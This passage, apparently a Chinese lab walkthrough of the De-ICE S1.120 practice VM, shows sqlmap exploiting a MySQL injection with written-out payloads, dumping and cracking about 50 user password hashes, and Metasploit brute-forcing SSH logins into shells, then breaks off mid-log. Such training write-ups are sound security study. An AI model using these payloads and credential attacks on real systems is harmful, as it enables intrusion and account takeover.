freebuf
本文来源:
下载地址
下载地址
http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso
任务信息
Various 'internal' documents
实战演练
原文再续,书接上文s1.100的系统
信息收集
netdiscover发现IP是192.168.1.120
使用anonymous登录,发现没什么东西
用原先的密码发现登录不了
我们来看看web系统
使用burpsuite抓包
将这个数据包保存下来使用sqlmap测试有没有注入漏洞
这个不存在,换另外一个页面
发现存在注入漏洞
使用sqlmap获取用户名和密码
root@kali:/tmp# sqlmap -r 2 --users --passwords ___ __H__ ___ ___[(]_____ ___ ___ {1.3#stable} |_ -| . [,] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 20:57:51 /2019-02-27/ [20:57:51] [INFO] parsing HTTP request from '2' [20:57:51] [INFO] resuming back-end DBMS 'mysql' [20:57:51] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2998=2998 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176717171,0x63584353424a59567a6e52636942566d78746a676471796f446e70746d6862735849517846427372,0x717a6b7671),NULL,NULL-- JSxW --- [20:57:51] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.2.11, PHP 5.2.9 back-end DBMS: MySQL >= 5.0.12 [20:57:51] [INFO] fetching database users database management system users [50]: [*] 'aadams'@'localhost' [*] 'aallen'@'localhost' [*] 'aard'@'localhost' [*] 'aharp'@'localhost' [*] 'aheflin'@'localhost' [*] 'amaynard'@'localhost' [*] 'aspears'@'localhost' [*] 'aweiland'@'localhost' [*] 'bbanter'@'localhost' [*] 'bphillips'@'localhost' [*] 'bwatkins'@'localhost' [*] 'cchisholm'@'localhost' [*] 'ccoffee'@'localhost' [*] 'dcooper'@'localhost' [*] 'dgilfillan'@'localhost' [*] 'dgrant'@'localhost' [*] 'djohnson'@'localhost' [*] 'dstevens'@'localhost' [*] 'dtraylor'@'localhost' [*] 'dwestling'@'localhost' [*] 'hlovell'@'localhost' [*] 'jalcantar'@'localhost' [*] 'jalvarez'@'localhost' [*] 'jayala'@'localhost' [*] 'jbresnahan'@'localhost' [*] 'jdavenport'@'localhost' [*] 'jduff'@'localhost' [*] 'jfranklin'@'localhost' [*] 'kclemons'@'localhost' [*] 'krenfro'@'localhost' [*] 'ktso'@'localhost' [*] 'kwebber'@'localhost' [*] 'lmartinez'@'localhost' [*] 'lmorales'@'localhost' [*] 'mbryan'@'localhost' [*] 'mholland'@'localhost' [*] 'mnader'@'localhost' [*] 'mrodriguez'@'localhost' [*] 'myajima'@'localhost' [*] 'qpowers'@'localhost' [*] 'rdominguez'@'localhost' [*] 'rjacobson'@'localhost' [*] 'rpatel'@'localhost' [*] 'sgains'@'localhost' [*] 'sjohnson'@'localhost' [*] 'strammel'@'localhost' [*] 'swarren'@'localhost' [*] 'tdeleon'@'localhost' [*] 'tgoodchap'@'localhost' [*] 'webapp'@'localhost' [20:57:51] [INFO] fetching database users password hashes do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y [20:57:54] [INFO] writing hashes to a temporary file '/tmp/sqlmap8lPFoA3319/sqlmaphashes-fmK_jw.txt' do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y [20:57:56] [INFO] using hash method 'mysql_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files [20:58:02] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] y [20:58:06] [INFO] starting dictionary-based cracking (mysql_passwd) [20:58:06] [INFO] starting 4 processes [20:58:06] [INFO] cracked password '0' for user 'lmorales' [20:58:07] [INFO] cracked password '111111' for user 'jfranklin' [20:58:07] [INFO] cracked password '12345' for user 'aweiland' [20:58:07] [INFO] cracked password '123456' for user 'dgilfillan' [20:58:07] [INFO] cracked password '12345678' for user 'bphillips' [20:58:07] [INFO] cracked password '123123' for user 'strammel' [20:58:07] [INFO] cracked password '1234' for user 'ccoffee' [20:58:07] [INFO] cracked password '1234567' for user 'hlovell' [20:58:07] [INFO] cracked password '666666' for user 'mbryan' [20:58:07] [INFO] cracked password '654321' for user 'aallen' [20:58:08] [INFO] cracked password 'batman' for user 'jayala' [20:58:08] [INFO] cracked password 'babyl0n' for user 'jdavenport' [20:58:08] [INFO] cracked password 'baseball' for user 'aadams' [20:58:08] [INFO] cracked password 'blahblah' for user 'krenfro' [20:58:08] [INFO] cracked password 'cheese' for user 'lmartinez' [20:58:08] [INFO] cracked password 'computer' for user 'aheflin' [20:58:08] [INFO] cracked password 'consumer' for user 'mnader' [20:58:09] [INFO] cracked password 'football' for user 'cchisholm' [20:58:09] [INFO] cracked password 'gawker' for user 'rjacobson' [20:58:09] [INFO] cracked password 'dragon' for user 'ktso' [20:58:09] [INFO] cracked password 'gizmodo' for user 'rpatel' [20:58:09] [INFO] cracked password 'internet' for user 'rdominguez' [20:58:10] [INFO] cracked password 'killer' for user 'bbanter' [20:58:10] [INFO] cracked password 'jordan' for user 'tgoodchap' [20:58:10] [INFO] cracked password 'iloveyou' for user 'swarren' [20:58:10] [INFO] cracked password 'kotaku' for user 'dtraylor' [20:58:10] [INFO] cracked password 'master' for user 'djohnson' [20:58:10] [INFO] cracked password 'jennifer' for user 'kclemons' [20:58:11] [INFO] cracked password 'michael' for user 'bwatkins' [20:58:11] [INFO] cracked password 'monkey' for user 'sjohnson' [20:58:11] [INFO] cracked password 'letmein' for user 'dstevens' [20:58:11] [INFO] cracked password 'lifehack' for user 'aharp' [20:58:11] [INFO] cracked password 'passw0rd' for user 'aspears' [20:58:11] [INFO] cracked password 'Password' for user 'jbresnahan' [20:58:11] [INFO] cracked password 'password' for user 'mrodriguez' [20:58:11] [INFO] cracked password 'michelle' for user 'jalcantar' [20:58:11] [INFO] cracked password 'pepper' for user 'dcooper' [20:58:11] [INFO] cracked password 'princess' for user 'kwebber' [20:58:11] [INFO] cracked password 'qwerty' for user 'aard' [20:58:11] [INFO] cracked password 'nintendo' for user 'dgrant' [20:58:12] [INFO] cracked password 'soccer' for user 'sgains' [20:58:12] [INFO] cracked password 'shadow' for user 'amaynard' [20:58:12] [INFO] cracked password 'pokemon' for user 'qpowers' [20:58:12] [INFO] cracked password 'starwars' for user 'tdeleon' [20:58:12] [INFO] cracked password 'superman' for user 'jduff' [20:58:12] [INFO] cracked password 'welcome' for user 'dwestling' [20:58:12] [INFO] cracked password 'whatever' for user 'jalvarez' [20:58:12] [INFO] cracked password 'trustno1' for user 'myajima' [20:58:13] [INFO] cracked password 'sunshine' for user 'mholland' [20:58:14] [INFO] using suffix '1' [20:58:21] [INFO] using suffix '123' [20:58:28] [INFO] using suffix '2' [20:58:36] [INFO] using suffix '12' [20:58:43] [INFO] using suffix '3' [20:58:50] [INFO] using suffix '13' [20:58:58] [INFO] using suffix '7' [20:59:05] [INFO] using suffix '11' [20:59:12] [INFO] using suffix '5' [20:59:18] [INFO] using suffix '22' [20:59:25] [INFO] using suffix '23' [20:59:32] [INFO] using suffix '01' [20:59:39] [INFO] using suffix '4' [20:59:46] [INFO] using suffix '07' [20:59:54] [INFO] using suffix '21' [21:00:02] [INFO] using suffix '14' [21:00:09] [INFO] using suffix '10' [21:00:17] [INFO] using suffix '06' [21:00:25] [INFO] using suffix '08' [21:00:33] [INFO] using suffix '8' [21:00:41] [INFO] using suffix '15' [21:00:48] [INFO] using suffix '69' [21:00:56] [INFO] using suffix '16' [21:01:02] [INFO] using suffix '6' [21:01:09] [INFO] using suffix '18' [21:01:16] [INFO] using suffix '!' [21:01:23] [INFO] using suffix '.' [21:01:30] [INFO] using suffix '*' [21:01:37] [INFO] using suffix '!!' [21:01:43] [INFO] using suffix '?' [21:01:50] [INFO] using suffix ';' [21:01:57] [INFO] using suffix '..' [21:02:03] [INFO] using suffix '!!!' [21:02:10] [INFO] using suffix ', ' [21:02:17] [INFO] using suffix '@' database management system users password hashes: [*] aadams [1]: password hash: *51AA306E66303073DBA15D2750E23C90C7A7F947 clear-text password: baseball [*] aallen [1]: password hash: *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 clear-text password: 654321 [*] aard [1]: password hash: *AA1420F182E88B9E5F874F6FBE7459291E8F4601 clear-text password: qwerty [*] aharp [1]: password hash: *79BF466BCC601BD91A0897BB162421F9BA8C29CA clear-text password: lifehack [*] aheflin [1]: password hash: *81101DED975D54BD76A3C8EAD293597AE9BB143F clear-text password: computer [*] amaynard [1]: password hash: *7B2F14D9BB629E334CD49A1028BD85750F7D3530 clear-text password: shadow [*] aspears [1]: password hash: *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 clear-text password: passw0rd [*] aweiland [1]: password hash: *00A51F3F48415C7D4E8908980D443C29C69B60C9 clear-text password: 12345 [*] bbanter [1]: password hash: *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8 clear-text password: killer [*] bphillips [1]: password hash: *84AAC12F54AB666ECFC2A83C676908C8BBC381B1 clear-text password: 12345678 [*] bwatkins [1]: password hash: *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00 clear-text password: michael [*] cchisholm [1]: password hash: *FCAAF3F0BD94C027B2769A95903C355CE6294660 clear-text password: football [*] ccoffee [1]: password hash: *A4B6157319038724E3560894F7F932C8886EBFCF clear-text password: 1234 [*] dcooper [1]: password hash: *626AC8265C7D53693CB7478376CE1B4825DFF286 clear-text password: pepper [*] dgilfillan [1]: password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 clear-text password: 123456 [*] dgrant [1]: password hash: *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9 clear-text password: nintendo [*] djohnson [1]: password hash: *8D6A637F37955DBFCE1229204DDBED1CE11E6F41 clear-text password: master [*] dstevens [1]: password hash: *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 clear-text password: letmein [*] dtraylor [1]: password hash: *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0 clear-text password: kotaku [*] dwestling [1]: password hash: *DF216F57F1F2066124E1AA5491D995C3CB57E4C2 clear-text password: welcome [*] hlovell [1]: password hash: *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5 clear-text password: 1234567 [*] jalcantar [1]: password hash: *ED043A01F4583450BC8EB1E83C00C372CA49C4E4 clear-text password: michelle [*] jalvarez [1]: password hash: *90837F291B744BBE86DF95A37D2B2524185DBBF5 clear-text password: whatever [*] jayala [1]: password hash: *F491287896471CB21030790BF46865C4A39DE651 clear-text password: batman [*] jbresnahan [1]: password hash: *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594 clear-text password: Password [*] jdavenport [1]: password hash: *61305383748FBEAB119F9A8BC35EBBADB4889A9D clear-text password: babyl0n [*] jduff [1]: password hash: *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E clear-text password: superman [*] jfranklin [1]: password hash: *FD571203974BA9AFE270FE62151AE967ECA5E0AA clear-text password: 111111 [*] kclemons [1]: password hash: *B021918A5DCA54916CF724573179571DFC37AC88 clear-text password: jennifer [*] krenfro [1]: password hash: *446525BB82B5E22BD9E525261D37C494F623C52B clear-text password: blahblah [*] ktso [1]: password hash: *F8E113FD51D520075836A4B815568BA2B96F7C30 clear-text password: dragon [*] kwebber [1]: password hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A clear-text password: princess [*] lmartinez [1]: password hash: *7FD9F123C9FC025372A5AAD19D107783CD19CCF7 clear-text password: cheese [*] lmorales [1]: password hash: *B12289EEF8752AD620294A64A37CD586223AB454 clear-text password: 0 [*] mbryan [1]: password hash: *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC clear-text password: 666666 [*] mholland [1]: password hash: *D6B63C1953E7F096DB307F8AC48C4AD703E57001 clear-text password: sunshine [*] mnader [1]: password hash: *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91 clear-text password: consumer [*] mrodriguez [1]: password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 clear-text password: password [*] myajima [1]: password hash: *46CFC7938B60837F46B610A2D10C248874555C14 clear-text password: trustno1 [*] qpowers [1]: password hash: *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC clear-text password: pokemon [*] rdominguez [1]: password hash: *797420C584EBF42750EB523104268BA0FD87FBC8 clear-text password: internet [*] rjacobson [1]: password hash: *3EEB06BE54EABF909DC8F6107110777F1DE43186 clear-text password: gawker [*] rpatel [1]: password hash: *D183105443FBDE597607B8BC5475A9E1B7847F3E clear-text password: gizmodo [*] sgains [1]: password hash: *94F3DC3F398B76269CAAD51627279D4233A6C89A clear-text password: soccer [*] sjohnson [1]: password hash: *A5892368AE83685440A1E27D012306B073BDF5B7 clear-text password: monkey [*] strammel [1]: password hash: *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 clear-text password: 123123 [*] swarren [1]: password hash: *CFBF459D9D6057BC2A85477A38327B96F06B1597 clear-text password: iloveyou [*] tdeleon [1]: password hash: *24B8599BAF46DD4B4D8DB50A3B10136457492622 clear-text password: starwars [*] tgoodchap [1]: password hash: *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC clear-text password: jordan [*] webapp [1]: password hash: *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F弄个字典做测试用户权限
msf5 > use auxiliary/scanner/ssh/ssh_login msf5 auxiliary(scanner/ssh/ssh_login) > show options Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120 msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE test USERPASS_FILE => test msf5 auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.1.120:22 - Success: 'lmorales:0' 'uid=1032(lmorales) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 1 opened (192.168.1.20:40725 -> 192.168.1.120:22) at 2019-02-27 21:48:53 -0500 [+] 192.168.1.120:22 - Success: 'jfranklin:111111' 'uid=1046(jfranklin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 2 opened (192.168.1.20:42317 -> 192.168.1.120:22) at 2019-02-27 21:48:53 -0500 [+] 192.168.1.120:22 - Success: 'aweiland:12345' 'uid=1048(aweiland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 3 opened (192.168.1.20:43443 -> 192.168.1.120:22) at 2019-02-27 21:48:54 -0500 [+] 192.168.1.120:22 - Success: 'dgilfillan:123456' 'uid=1017(dgilfillan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 4 opened (192.168.1.20:46539 -> 192.168.1.120:22) at 2019-02-27 21:48:54 -0500 [+] 192.168.1.120:22 - Success: 'bphillips:12345678' 'uid=1033(bphillips) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 5 opened (192.168.1.20:39633 -> 192.168.1.120:22) at 2019-02-27 21:48:54 -0500 [+] 192.168.1.120:22 - Success: 'strammel:123123' 'uid=1015(strammel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 6 opened (192.168.1.20:44741 -> 192.168.1.120:22) at 2019-02-27 21:48:55 -0500 [+] 192.168.1.120:22 - Success: 'ccoffee:1234' 'uid=1023(ccoffee) gid=100(users) groups=100(users),102(admin) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 7 opened (192.168.1.20:34423 -> 192.168.1.120:22) at 2019-02-27 21:48:55 -0500 [+] 192.168.1.120:22 - Success: 'hlovell:1234567' 'uid=1014(hlovell) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 8 opened (192.168.1.20:35515 -> 192.168.1.120:22) at 2019-02-27 21:48:55 -0500 [+] 192.168.1.120:22 - Success: 'mbryan:666666' 'uid=1019(mbryan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 9 opened (192.168.1.20:36715 -> 192.168.1.120:22) at 2019-02-27 21:48:56 -0500 [+] 192.168.1.120:22 - Success: 'aallen:654321' 'uid=1002(aallen) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 10 opened (192.168.1.20:44879 -> 192.168.1.120:22) at 2019-02-27 21:48:56 -0500 [+] 192.168.1.120:22 - Success: 'jayala:batman' 'uid=1034(jayala) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 11 opened (192.168.1.20:46545 -> 192.168.1.120:22) at 2019-02-27 21:48:57 -0500 [+] 192.168.1.120:22 - Success: 'jdavenport:babyl0n' 'uid=1027(jdavenport) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 12 opened (192.168.1.20:33813 -> 192.168.1.120:22) at 2019-02-27 21:48:57 -0500 [+] 192.168.1.120:22 - Success: 'aadams:baseball' 'uid=1030(aadams) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 13 opened (192.168.1.20:33773 -> 192.168.1.120:22) at 2019-02-27 21:48:57 -0500 [+] 192.168.1.120:22 - Success: 'krenfro:blahblah' 'uid=1038(krenfro) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 14 opened (192.168.1.20:37801 -> 192.168.1.120:22) at 2019-02-27 21:48:58 -0500 [+] 192.168.1.120:22 - Success: 'lmartinez:cheese' 'uid=1008(lmartinez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 15 opened (192.168.1.20:45273 -> 192.168.1.120:22) at 2019-02-27 21:48:58 -0500 [+] 192.168.1.120:22 - Success: 'aheflin:computer' 'uid=1012(aheflin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 16 opened (192.168.1.20:33739 -> 192.168.1.120:22) at 2019-02-27 21:48:58 -0500 [+] 192.168.1.120:22 - Success: 'mnader:consumer' 'uid=1007(mnader) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 17 opened (192.168.1.20:40947 -> 192.168.1.120:22) at 2019-02-27 21:48:59 -0500 [+] 192.168.1.120:22 - Success: 'cchisholm:football' 'uid=1042(cchisholm) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 18 opened (192.168.1.20:32883 -> 192.168.1.120:22) at 2019-02-27 21:48:59 -0500 [+] 192.168.1.120:22 - Success: 'rjacobson:gawker' 'uid=1009(rjacobson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 19 opened (192.168.1.20:41681 -> 192.168.1.120:22) at 2019-02-27 21:49:00 -0500 [+] 192.168.1.120:22 - Success: 'ktso:dragon' 'uid=1022(ktso) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 20 opened (192.168.1.20:34843 -> 192.168.1.120:22) at 2019-02-27 21:49:00 -0500 [+] 192.168.1.120:22 - Success: 'rpatel:gizmodo' 'uid=1029(rpatel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 21 opened (192.168.1.20:43571 -> 192.168.1.120:22) at 2019-02-27 21:49:00 -0500 [+] 192.168.1.120:22 - Success: 'rdominguez:internet' 'uid=1031(rdominguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 22 opened (192.168.1.20:43249 -> 192.168.1.120:22) at 2019-02-27 21:49:01 -0500 [+] 192.168.1.120:22 - Success: 'bbanter:killer' 'uid=1011(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 23 opened (192.168.1.20:34883 -> 192.168.1.120:22) at 2019-02-27 21:49:01 -0500 [+] 192.168.1.120:22 - Success: 'tgoodchap:jordan' 'uid=1045(tgoodchap) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 24 opened (192.168.1.20:46345 -> 192.168.1.120:22) at 2019-02-27 21:49:01 -0500 [+] 192.168.1.120:22 - Success: 'swarren:iloveyou' 'uid=1020(swarren) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 25 opened (192.168.1.20:44831 -> 192.168.1.120:22) at 2019-02-27 21:49:02 -0500 [+] 192.168.1.120:22 - Success: 'dtraylor:kotaku' 'uid=1026(dtraylor) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 26 opened (192.168.1.20:35791 -> 192.168.1.120:22) at 2019-02-27 21:49:02 -0500 [+] 192.168.1.120:22 - Success: 'djohnson:master' 'uid=1037(djohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 27 opened (192.168.1.20:33483 -> 192.168.1.120:22) at 2019-02-27 21:49:02 -0500 [+] 192.168.1.120:22 - Success: 'kclemons:jennifer' 'uid=1040(kclemons) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 28 opened (192.168.1.20:36961 -> 192.168.1.120:22) at 2019-02-27 21:49:03 -0500 [+] 192.168.1.120:22 - Success: 'bwatkins:michael' 'uid=1028(bwatkins) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 29 opened (192.168.1.20:32949 -> 192.168.1.120:22) at 2019-02-27 21:49:03 -0500 [+] 192.168.1.120:22 - Success: 'sjohnson:monkey' 'uid=1024(sjohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 30 opened (192.168.1.20:40099 -> 192.168.1.120:22) at 2019-02-27 21:49:04 -0500 [+] 192.168.1.120:22 - Success: 'dstevens:letmein' 'uid=1039(dstevens) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 31 opened (192.168.1.20:40185 -> 192.168.1.120:22) at 2019-02-27 21:49:04 -0500 [+] 192.168.1.120:22 - Success: 'aharp:lifehack' 'uid=1001(aharp) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 32 opened (192.168.1.20:45919 -> 192.168.1.120:22) at 2019-02-27 21:49:04 -0500 [+] 192.168.1.120:22 - Success: 'aspears:passw0rd' 'uid=1003(aspears) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 33 opened (192.168.1.20:35535 -> 192.168.1.120:22) at 2019-02-27 21:49:05 -0500 [+] 192.168.1.120:22 - Success: 'jbresnahan:Password' 'uid=1041(jbresnahan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 34 opened (192.168.1.20:33807 -> 192.168.1.120:22) at 2019-02-27 21:49:05 -0500 [+] 192.168.1.120:22 - Success: 'mrodriguez:password' 'uid=1013(mrodriguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 35 opened (192.168.1.20:44515 -> 192.168.1.120:22) at 2019-02-27 21:49:05 -0500 [+] 192.168.1.120:22 - Success: 'jalcantar:michelle' 'uid=1025(jalcantar) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 36 opened (192.168.1.20:44687 -> 192.168.1.120:22) at 2019-02-27 21:49:06 -0500 [+] 192.168.1.120:22 - Success: 'dcooper:pepper' 'uid=1036(dcooper) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 